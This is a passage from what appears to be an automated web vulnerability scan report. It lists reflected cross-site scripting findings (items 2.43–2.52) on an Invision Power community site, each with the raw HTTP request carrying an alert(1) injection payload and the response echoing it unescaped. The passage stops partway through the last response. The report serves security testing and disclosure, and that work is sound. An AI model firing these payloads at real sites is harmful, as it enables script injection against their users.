Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=fe0291a4b1037d3d3b5c18ad01340692; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:07:02 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:07:04 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:07:05 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trTOtDI0sjQzs7AwMDK2rgVcMFxcZAag; expires=Thu, 02-Feb-2012 23:07:05 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1";
       ipb.sharelinks.title = "Vietnamese 3.x.x lang";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3940-dp31-ihost/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=646b6b288c61575cd993419c6b0d1b8a; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:56 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:56 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:57 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbDOtDI0sjQzs7AwMDS3rgVcMFvtBps%2C; expires=Thu, 02-Feb-2012 23:06:57 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1";
       ipb.sharelinks.title = "(DP31) iHost";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3941-vanilla-valentine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8b7a1a276454ffaafa910c756ad6e0d5; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:37 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:38 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:40 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbTOtDI0sjQzszC3tLSwrgVcMFxcRwat; expires=Thu, 02-Feb-2012 23:06:40 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1";
       ipb.sharelinks.title = "Vanilla Valentine";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3942-sos31-file-version-in-online-list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c8dae556708fda16a70e1ba264087145; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:31 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:32 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:34 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbLOtDI0sjQzszC3tDSyrgVcMFxcRQao; expires=Thu, 02-Feb-2012 23:06:34 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1";
       ipb.sharelinks.title = "(SOS31) File Version in Online List";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3943-speed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ff77aa3002ae5ebe3b9da498e614ab3e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:32 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:35 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:37 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbbOtDI0sjQzszC3tDSxrgVcMFxcWwar; expires=Thu, 02-Feb-2012 23:06:37 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1";
       ipb.sharelinks.title = "Speed";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3944-ipchat-12-turkish-language-pack/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1944fba0c751e2b21987bd8118d01990; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:20 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:23 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:24 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbHOtDI0sjQzszC3tDC0rgVcMFxcXgao; expires=Thu, 02-Feb-2012 23:06:24 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1";
       ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e664c7c64f3b4729c92627fef198c533; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:45 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32784

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' />
...[SNIP]...

2.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=0226a82b48937e63fc6cf50878e14f6a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:25 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:25 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmloYWFibWtVwwUC0GOQ%2C%2C; expires=Fri, 03-Feb-2012 00:11:25 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34426

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' />
...[SNIP]...

2.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=e3d274e04eb68da8518ccc19e454a496; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:39 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:39 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNLSwtLSuBVwwVe8GcQ%2C%2C; expires=Fri, 03-Feb-2012 00:11:39 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33664

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' />
...[SNIP]...

2.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a9bd7f2f7a35acf5a28529ed3969c3d7; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:29 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:29 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmloYWFhbWtVwwUEkGPg%2C%2C; expires=Fri, 03-Feb-2012 00:11:29 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33886

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' />
...[SNIP]...

2.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d323303f034c4eef3dca54fb788a70ee; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:13 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:11:13 GMT; path=/; domain=community.invisionpower.com
